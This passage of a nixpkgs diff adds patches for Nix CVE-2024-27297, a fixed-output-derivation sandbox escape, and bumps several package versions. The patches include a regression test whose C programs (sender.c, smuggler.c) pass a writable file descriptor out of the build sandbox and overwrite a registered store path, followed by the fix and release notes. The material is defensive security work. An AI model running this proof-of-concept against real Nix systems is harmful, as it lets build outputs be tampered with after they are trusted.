++++ b/tests/nixos/ca-fd-leak/smuggler.c
+@@ -0,0 +1,66 @@
++#include <sys/socket.h>
++#include <sys/un.h>
++#include <stdlib.h>
++#include <stddef.h>
++#include <stdio.h>
++#include <unistd.h>
++#include <assert.h>
++
++int main(int argc, char **argv) {
++
++    assert(argc == 2);
++
++    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
++
++    // Bind to the socket.
++    struct sockaddr_un data;
++    data.sun_family = AF_UNIX;
++    data.sun_path[0] = 0;
++    strcpy(data.sun_path + 1, argv[1]);
++    int res = bind(sock, (const struct sockaddr *)&data,
++        offsetof(struct sockaddr_un, sun_path)
++        + strlen(argv[1])
++        + 1);
++    if (res < 0) perror("bind");
++
++    res = listen(sock, 1);
++    if (res < 0) perror("listen");
++
++    int smuggling_fd = -1;
++
++    // Accept the connection a first time to receive the file descriptor.
++    fprintf(stderr, "%s\n", "Waiting for the first connection");
++    int a = accept(sock, 0, 0);
++    if (a < 0) perror("accept");
++
++    struct msghdr msg = {0};
++    msg.msg_control = malloc(128);
++    msg.msg_controllen = 128;
++
++    // Receive the file descriptor as sent by the smuggler.
++    recvmsg(a, &msg, 0);
++
++    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
++    while (hdr) {
++        if (hdr->cmsg_level == SOL_SOCKET
++          && hdr->cmsg_type == SCM_RIGHTS) {
++
++            // Grab the copy of the file descriptor.
++            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
++        }
++
++        hdr = CMSG_NXTHDR(&msg, hdr);
++    }
++    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
++    close(a);
++
++    // Wait for a second connection, which will tell us that the build is
++    // done
++    a = accept(sock, 0, 0);
++    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
++    // Write a new content to the file
++    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
++    char * new_content = "Pwned\n";
++    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
++    if (written_bytes != strlen(new_content)) perror("write");
++}
+diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix
+index 4459aa664..4c1cf785c 100644
+--- a/tests/nixos/default.nix
++++ b/tests/nixos/default.nix
+@@ -40,4 +40,6 @@ in
+   setuid = lib.genAttrs
+     ["i686-linux" "x86_64-linux"]
+     (system: runNixOSTestFor system ./setuid.nix);
++
++  ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
+ }
+-- 
+2.42.0
+
+
+From 558dab42315f493aa4e8480a57c2d3b0834392ec Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <theophane.hufschmitt@tweag.io>
+Date: Tue, 13 Feb 2024 08:28:02 +0100
+Subject: [PATCH 2/4] Copy the output of fixed-output derivations before
+ registering them
+
+It is possible to exfiltrate a file descriptor out of the build sandbox
+of FODs, and use it to modify the store path after it has been
+registered.
+To avoid that issue, don't register the output of the build, but a copy
+of it (that will be free of any leaked file descriptor).
+---
+ src/libstore/build/local-derivation-goal.cc | 6 ++++++
+ src/libutil/file-system.cc                  | 5 +++++
+ src/libutil/file-system.hh                  | 7 +++++++
+ 3 files changed, 18 insertions(+)
+
+diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
+index a9f930773..d83c47d00 100644
+--- a/src/libstore/build/local-derivation-goal.cc
++++ b/src/libstore/build/local-derivation-goal.cc
+@@ -2543,6 +2543,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
+             [&](const DerivationOutput::CAFixed & dof) {
+                 auto & wanted = dof.ca.hash;
+ 
++                // Replace the output by a fresh copy of itself to make sure
++                // that there's no stale file descriptor pointing to it
++                Path tmpOutput = actualPath + ".tmp";
++                copyFile(actualPath, tmpOutput, true);
++                renameFile(tmpOutput, actualPath);
++
+                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
+                     .method = dof.ca.method,
+                     .hashType = wanted.type,
+diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
+index c96effff9..777f83c30 100644
+--- a/src/libutil/file-system.cc
++++ b/src/libutil/file-system.cc
+@@ -616,6 +616,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
+     }
+ }
+ 
++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
++{
++    return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
++}
++
+ void renameFile(const Path & oldName, const Path & newName)
+ {
+     fs::rename(oldName, newName);
+diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
+index 4637507b3..71db7d8bc 100644
+--- a/src/libutil/file-system.hh
++++ b/src/libutil/file-system.hh
+@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst);
+  */
+ void moveFile(const Path & src, const Path & dst);
+ 
++/**
++ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
++ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
++ * with the guaranty that the destination will be “fresh”, with no stale inode
++ * or file descriptor pointing to it).
++ */
++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
+ 
+ /**
+  * Automatic cleanup of resources.
+-- 
+2.42.0
+
+
+From 6adce5c3baddf20a5865a646a6d5117e83693497 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <7226587+thufschmitt@users.noreply.github.com>
+Date: Wed, 21 Feb 2024 17:32:36 +0100
+Subject: [PATCH 3/4] Fix a typo in a test comment
+
+Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
+---
+ tests/nixos/ca-fd-leak/default.nix | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
+index 40e57ea02..a6ae72adc 100644
+--- a/tests/nixos/ca-fd-leak/default.nix
++++ b/tests/nixos/ca-fd-leak/default.nix
+@@ -80,7 +80,7 @@ in
+     # Tell the smuggler server that we're done
+     machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+ 
+-    # Check that the file was modified
++    # Check that the file was not modified
+     machine.succeed(r"""
+       cat ./result
+       test "$(cat ./result)" = "hello, world"
+-- 
+2.42.0
+
+
+From 7a803d9d5460cc990f20eff7d4d5a3623298c15b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <theophane.hufschmitt@tweag.io>
+Date: Fri, 1 Mar 2024 09:31:05 +0100
+Subject: [PATCH 4/4] Add release notes
+
+---
+ doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+ create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
+
+diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
+new file mode 100644
+index 000000000..ed451711e
+--- /dev/null
++++ b/doc/manual/rl-next/fod-sandbox-escape.md
+@@ -0,0 +1,14 @@
++---
++synopsis: Fix a FOD sandbox escape
++issues:
++prs:
++---
++
++Cooperating Nix derivations could send file descriptors to files in the Nix
++store to each other via Unix domain sockets in the abstract namespace. This
++allowed one derivation to modify the output of the other derivation, after Nix
++has registered the path as "valid" and immutable in the Nix database.
++In particular, this allowed the output of fixed-output derivations to be
++modified from their expected content.
++
++This isn't the case any more.
+-- 
+2.42.0
diff --git a/nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch b/nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch
new file mode 100644
index 000000000000..b8201cb99ef5
--- /dev/null
+++ b/nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch
@@ -0,0 +1,375 @@
+From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <theophane.hufschmitt@tweag.io>
+Date: Mon, 12 Feb 2024 21:28:20 +0100
+Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape
+
+Test that we can't leverage abstract unix domain sockets to leak file
+descriptors out of the sandbox and modify the path after it has been
+registered.
+---
+ release.nix                        |  5 ++
+ tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++
+ tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
+ tests/nixos/ca-fd-leak/smuggler.c  | 66 +++++++++++++++++++++
+ 4 files changed, 229 insertions(+)
+ create mode 100644 tests/nixos/ca-fd-leak/default.nix
+ create mode 100644 tests/nixos/ca-fd-leak/sender.c
+ create mode 100644 tests/nixos/ca-fd-leak/smuggler.c
+
+diff --git a/release.nix b/release.nix
+index f468946c5..2e71f3796 100644
+--- a/release.nix
++++ b/release.nix
+@@ -235,6 +235,11 @@ let
+       nix = build.x86_64-linux; system = "x86_64-linux";
+     });
+ 
++    tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec {
++      inherit nixpkgs;
++      nix = build.x86_64-linux; system = "x86_64-linux";
++    });
++
+     tests.setuid = pkgs.lib.genAttrs
+       ["i686-linux" "x86_64-linux"]
+       (system:
+diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
+new file mode 100644
+index 000000000..c252caa4d
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/default.nix
+@@ -0,0 +1,93 @@
++# Nix is a sandboxed build system. But Not everything can be handled inside its
++# sandbox: Network access is normally blocked off, but to download sources, a
++# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
++# The detail here is not important, but in our case it means that the hash of
++# the output has to be known beforehand. And if you know that, you get a few
++# rights: you no longer run inside a special network namespace!
++#
++# Now, Linux has a special feature, that not many other unices do: Abstract
++# unix domain sockets! Not only that, but those are namespaced using the
++# network namespace! That means that we have a way to create sockets that are
++# available in every single fixed-output derivation, and also all processes
++# running on the host machine! Now, this wouldn't be that much of an issue, as,
++# well, the whole idea is that the output is pure, and all processes in the
++# sandbox are killed before finalizing the output. What if we didn't need those
++# processes at all? Unix domain sockets have a semi-known trick: you can pass
++# file descriptors around!
++# This makes it possible to exfiltrate a file-descriptor with write access to
++# $out outside of the sandbox. And that file-descriptor can be used to modify
++# the contents of the store path after it has been registered.
++
++{ nixpkgs, system, nix }:
++
++with import (nixpkgs + "/nixos/lib/testing-python.nix") {
++  inherit system;
++};
++
++let
++  # Simple C program that sends a a file descriptor to `$out` to a Unix
++  # domain socket.
++  # Compiled statically so that we can easily send it to the VM and use it
++  # inside the build sandbox.
++  sender = pkgs.runCommandWith {
++    name = "sender";
++    stdenv = pkgs.pkgsStatic.stdenv;
++  } ''
++    $CC -static -o $out ${./sender.c}
++  '';
++
++  # Okay, so we have a file descriptor shipped out of the FOD now. But the
++  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
++  # lives in a mount namespace where it is not! So even when this file exists
++  # in the actual Nix store, we're capable of just modifying its contents...
++  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
++
++  # The abstract socket path used to exfiltrate the file descriptor
++  socketName = "FODSandboxExfiltrationSocket";
++in
++makeTest {
++  name = "ca-fd-leak";
++
++  nodes.machine =
++    { config, lib, pkgs, ... }:
++    { virtualisation.writableStore = true;
++      virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
++      nix.binaryCaches = [ ];
++      nix.package = nix;
++    };
++
++  testScript = { nodes }: ''
++    start_all()
++
++    machine.succeed("echo hello")
++    # Start the smuggler server
++    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
++
++    # Build the smuggled derivation.
++    # This will connect to the smuggler server and send it the file descriptor
++    machine.succeed(r"""
++      nix-build -E '
++        builtins.derivation {
++          name = "smuggled";
++          system = builtins.currentSystem;
++          # look ma, no tricks!
++          outputHashMode = "flat";
++          outputHashAlgo = "sha256";
++          outputHash = builtins.hashString "sha256" "hello, world\n";
++          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
++          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
++      }'
++    """.strip())
++
++
++    # Tell the smuggler server that we're done
++    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
++
++    # Check that the file was modified
++    machine.succeed(r"""
++      cat ./result
++      test "$(cat ./result)" = "hello, world"
++    """.strip())
++  '';
++
++}
+diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
+new file mode 100644
+index 000000000..75e54fc8f
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/sender.c
+@@ -0,0 +1,65 @@
++#include <sys/socket.h>
++#include <sys/un.h>
++#include <stdlib.h>
++#include <stddef.h>
++#include <stdio.h>
++#include <unistd.h>
++#include <fcntl.h>
++#include <errno.h>
++#include <string.h>
++#include <assert.h>
++
++int main(int argc, char **argv) {
++
++    assert(argc == 2);
++
++    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
++
++    // Set up a abstract domain socket path to connect to.
++    struct sockaddr_un data;
++    data.sun_family = AF_UNIX;
++    data.sun_path[0] = 0;
++    strcpy(data.sun_path + 1, argv[1]);
++
++    // Now try to connect, To ensure we work no matter what order we are
++    // executed in, just busyloop here.
++    int res = -1;
++    while (res < 0) {
++        res = connect(sock, (const struct sockaddr *)&data,
++            offsetof(struct sockaddr_un, sun_path)
++              + strlen(argv[1])
++              + 1);
++        if (res < 0 && errno != ECONNREFUSED) perror("connect");
++        if (errno != ECONNREFUSED) break;
++    }
++
++    // Write our message header.
++    struct msghdr msg = {0};
++    msg.msg_control = malloc(128);
++    msg.msg_controllen = 128;
++
++    // Write an SCM_RIGHTS message containing the output path.
++    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
++    hdr->cmsg_len = CMSG_LEN(sizeof(int));
++    hdr->cmsg_level = SOL_SOCKET;
++    hdr->cmsg_type = SCM_RIGHTS;
++    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
++    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
++
++    msg.msg_controllen = CMSG_SPACE(sizeof(int));
++
++    // Write a single null byte too.
++    msg.msg_iov = malloc(sizeof(struct iovec));
++    msg.msg_iov[0].iov_base = "";
++    msg.msg_iov[0].iov_len = 1;
++    msg.msg_iovlen = 1;
++
++    // Send it to the othher side of this connection.
++    res = sendmsg(sock, &msg, 0);
++    if (res < 0) perror("sendmsg");
++    int buf;
++
++    // Wait for the server to close the socket, implying that it has
++    // received the commmand.
++    recv(sock, (void *)&buf, sizeof(int), 0);
++}
+diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
+new file mode 100644
+index 000000000..82acf37e6
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/smuggler.c
+@@ -0,0 +1,66 @@
++#include <sys/socket.h>
++#include <sys/un.h>
++#include <stdlib.h>
++#include <stddef.h>
++#include <stdio.h>
++#include <unistd.h>
++#include <assert.h>
++
++int main(int argc, char **argv) {
++
++    assert(argc == 2);
++
++    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
++
++    // Bind to the socket.
++    struct sockaddr_un data;
++    data.sun_family = AF_UNIX;
++    data.sun_path[0] = 0;
++    strcpy(data.sun_path + 1, argv[1]);
++    int res = bind(sock, (const struct sockaddr *)&data,
++        offsetof(struct sockaddr_un, sun_path)
++        + strlen(argv[1])
++        + 1);
++    if (res < 0) perror("bind");
++
++    res = listen(sock, 1);
++    if (res < 0) perror("listen");
++
++    int smuggling_fd = -1;
++
++    // Accept the connection a first time to receive the file descriptor.
++    fprintf(stderr, "%s\n", "Waiting for the first connection");
++    int a = accept(sock, 0, 0);
++    if (a < 0) perror("accept");
++
++    struct msghdr msg = {0};
++    msg.msg_control = malloc(128);
++    msg.msg_controllen = 128;
++
++    // Receive the file descriptor as sent by the smuggler.
++    recvmsg(a, &msg, 0);
++
++    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
++    while (hdr) {
++        if (hdr->cmsg_level == SOL_SOCKET
++          && hdr->cmsg_type == SCM_RIGHTS) {
++
++            // Grab the copy of the file descriptor.
++            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
++        }
++
++        hdr = CMSG_NXTHDR(&msg, hdr);
++    }
++    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
++    close(a);
++
++    // Wait for a second connection, which will tell us that the build is
++    // done
++    a = accept(sock, 0, 0);
++    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
++    // Write a new content to the file
++    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
++    char * new_content = "Pwned\n";
++    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
++    if (written_bytes != strlen(new_content)) perror("write");
++}
+
+From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <theophane.hufschmitt@tweag.io>
+Date: Tue, 13 Feb 2024 08:28:02 +0100
+Subject: [PATCH 2/4] Copy the output of fixed-output derivations before
+ registering them
+
+It is possible to exfiltrate a file descriptor out of the build sandbox
+of FODs, and use it to modify the store path after it has been
+registered.
+To avoid that issue, don't register the output of the build, but a copy
+of it (that will be free of any leaked file descriptor).
+---
+ src/libstore/build.cc | 11 +++++++++--
+ 1 file changed, 9 insertions(+), 2 deletions(-)
+
+diff --git a/src/libstore/build.cc b/src/libstore/build.cc
+index d3a712c1a..3fb827a15 100644
+--- a/src/libstore/build.cc
++++ b/src/libstore/build.cc
+@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs()
+             throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path);
+ #endif
+ 
+-        /* Apply hash rewriting if necessary. */
++        /* Apply hash rewriting if necessary.
++         *
++         * For FODs, we always do the dump-and-restore dance regardless to make
++         * sure that there's no stale file descriptor pointing to the output
++         * of the path.
++         * */
+         bool rewritten = false;
+-        if (!outputRewrites.empty()) {
++        if (fixedOutput || !outputRewrites.empty()) {
++            if (!outputRewrites.empty()) {
+             printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path);
++            }
+ 
+             /* Canonicalise first.  This ensures that the path we're
+                rewriting doesn't contain a hard link to /etc/shadow or
+
+From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <7226587+thufschmitt@users.noreply.github.com>
+Date: Wed, 21 Feb 2024 17:32:36 +0100
+Subject: [PATCH 3/4] Fix a typo in a test comment
+
+Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
+---
+ tests/nixos/ca-fd-leak/default.nix | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
+index c252caa4d..2fd5ca2d6 100644
+--- a/tests/nixos/ca-fd-leak/default.nix
++++ b/tests/nixos/ca-fd-leak/default.nix
+@@ -83,7 +83,7 @@ makeTest {
+     # Tell the smuggler server that we're done
+     machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+ 
+-    # Check that the file was modified
++    # Check that the file was not modified
+     machine.succeed(r"""
+       cat ./result
+       test "$(cat ./result)" = "hello, world"
+
+From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <theophane.hufschmitt@tweag.io>
+Date: Fri, 1 Mar 2024 09:31:05 +0100
+Subject: [PATCH 4/4] Add release notes
+
+---
+ doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+ create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
+
+diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
+new file mode 100644
+index 000000000..ed451711e
+--- /dev/null
++++ b/doc/manual/rl-next/fod-sandbox-escape.md
+@@ -0,0 +1,14 @@
++---
++synopsis: Fix a FOD sandbox escape
++issues:
++prs:
++---
++
++Cooperating Nix derivations could send file descriptors to files in the Nix
++store to each other via Unix domain sockets in the abstract namespace. This
++allowed one derivation to modify the output of the other derivation, after Nix
++has registered the path as "valid" and immutable in the Nix database.
++In particular, this allowed the output of fixed-output derivations to be
++modified from their expected content.
++
++This isn't the case any more.
diff --git a/nixpkgs/pkgs/tools/package-management/pacman/default.nix b/nixpkgs/pkgs/tools/package-management/pacman/default.nix
index 800e392f0f24..90252dca9cb2 100644
--- a/nixpkgs/pkgs/tools/package-management/pacman/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/pacman/default.nix
@@ -1,7 +1,6 @@
 { lib
 , stdenv
-, fetchpatch
-, fetchurl
+, fetchFromGitLab
 , asciidoc
 , binutils
 , coreutils
@@ -39,19 +38,23 @@
 , sysHookDir ? "/usr/share/libalpm/hooks/"
 }:
 
-stdenv.mkDerivation rec {
+stdenv.mkDerivation (final: {
   pname = "pacman";
-  version = "6.0.2";
+  version = "6.1.0";
 
-  src = fetchurl {
-    url = "https://sources.archlinux.org/other/${pname}/${pname}-${version}.tar.xz";
-    hash = "sha256-fY4+jFEhrsCWXfcfWb7fRgUsbPFPljZcRBHsPeCkwaU=";
+  src = fetchFromGitLab {
+    domain = "gitlab.archlinux.org";
+    owner = "pacman";
+    repo = "pacman";
+    rev = "v${final.version}";
+    hash = "sha256-uHBq1A//YSqFATlyqjC5ZgmvPkNKqp7sVew+nbmLH78=";
   };
 
   strictDeps = true;
 
   nativeBuildInputs = [
     asciidoc
+    gettext
     installShellFiles
     libarchive
     makeWrapper
@@ -71,11 +74,6 @@ stdenv.mkDerivation rec {
 
   patches = [
     ./dont-create-empty-dirs.patch
-    # Add keyringdir meson option to configure the keyring directory
-    (fetchpatch {
-      url = "https://gitlab.archlinux.org/pacman/pacman/-/commit/79bd512181af12ec80fd8f79486fc9508fa4a1b3.patch";
-      hash = "sha256-ivTPwWe06Q5shn++R6EY0x3GC0P4X0SuC+F5sndfAtM=";
-    })
   ];
 
   postPatch = let compressionTools = [
@@ -93,16 +91,16 @@ stdenv.mkDerivation rec {
     substituteInPlace meson.build \
       --replace "install_dir : SYSCONFDIR" "install_dir : '$out/etc'" \
       --replace "join_paths(DATAROOTDIR, 'libalpm/hooks/')" "'${sysHookDir}'" \
-      --replace "join_paths(PREFIX, DATAROOTDIR, get_option('keyringdir'))" "'\$KEYRING_IMPORT_DIR'"
+      --replace "join_paths(PREFIX, DATAROOTDIR, get_option('keyringdir'))" "'\$KEYRING_IMPORT_DIR'" \
+      --replace "join_paths(SYSCONFDIR, 'makepkg.conf.d/')" "'$out/etc/makepkg.conf.d/'"
     substituteInPlace doc/meson.build \
       --replace "/bin/true" "${coreutils}/bin/true"
     substituteInPlace scripts/repo-add.sh.in \
       --replace bsdtar "${libarchive}/bin/bsdtar"
     substituteInPlace scripts/pacman-key.sh.in \
       --replace "local KEYRING_IMPORT_DIR='@keyringdir@'" "" \
-      --subst-var-by keyringdir '\$KEYRING_IMPORT_DIR' \
-      --replace "--batch --check-trustdb" "--batch --check-trustdb --allow-weak-key-signatures"
-  ''; # the line above should be removed once Arch migrates to gnupg 2.3.x
+      --subst-var-by keyringdir '\$KEYRING_IMPORT_DIR'
+  '';
 
   mesonFlags = [
     "--sysconfdir=/etc"
@@ -132,6 +130,7 @@ stdenv.mkDerivation rec {
     changelog = "https://gitlab.archlinux.org/pacman/pacman/-/raw/v${version}/NEWS";
     license = licenses.gpl2Plus;
     platforms = platforms.linux;
+    mainProgram = "pacman";
     maintainers = with maintainers; [ samlukeyes123 ];
   };
-}
+})
diff --git a/nixpkgs/pkgs/tools/package-management/pdm/default.nix b/nixpkgs/pkgs/tools/package-management/pdm/default.nix
index 957b11b084fa..88ed0768b1d8 100644
--- a/nixpkgs/pkgs/tools/package-management/pdm/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/pdm/default.nix
@@ -35,14 +35,14 @@ in
 with python.pkgs;
 buildPythonApplication rec {
   pname = "pdm";
-  version = "2.12.3";
+  version = "2.12.4";
   pyproject = true;
 
   disabled = pythonOlder "3.8";
 
   src = fetchPypi {
     inherit pname version;
-    hash = "sha256-U82rcnwUaf3Blu/Y1/+EBKPKke5DwKVxRzbyAg0KXd8=";
+    hash = "sha256-0Eh3Ni+Vz5/8HSw4uFH2k3BuSSiEDkiYauV22tV0FJY=";
   };
 
   nativeBuildInputs = [
diff --git a/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix b/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix
index cf4b0334dcd6..5e2cc63644ab 100644
--- a/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix
+++ b/nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix
@@ -38,8 +38,8 @@
 
 buildPythonPackage rec {
   pname = "poetry";
-  version = "1.8.1";
-  format = "pyproject";
+  version = "1.8.2";
+  pyproject = true;
 
   disabled = pythonOlder "3.8";
 
@@ -47,7 +47,7 @@ buildPythonPackage rec {
     owner = "python-poetry";
     repo = "poetry";
     rev = "refs/tags/${version}";
-    hash = "sha256-tHtd5vO3TMjO0gqyECuS0FUAcE90nkKZwOm3ne6poFQ=";
+    hash = "sha256-MBWVeS/UHpzeeNUeiHMoXnLA3enRO/6yGIbg4Vf2GxU=";
   };
 
   nativeBuildInputs = [
diff --git a/nixpkgs/pkgs/tools/package-management/protontricks/default.nix b/nixpkgs/pkgs/tools/package-management/protontricks/default.nix
index 462a2546ff5d..c3c43163c671 100644
--- a/nixpkgs/pkgs/tools/package-management/protontricks/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/protontricks/default.nix
@@ -16,13 +16,13 @@
 
 buildPythonApplication rec {
   pname = "protontricks";
-  version = "1.11.0";
+  version = "1.11.1";
 
   src = fetchFromGitHub {
     owner = "Matoking";
     repo = pname;
     rev = version;
-    sha256 = "sha256-5FpcIaQodvNjdqUfD9hvXlrdhszr98j0zm3MCCpZFoc=";
+    sha256 = "sha256-a40IAFrzQ0mogMoXKb+Lp0fPc1glYophqtftigk3nAc=";
   };
 
   patches = [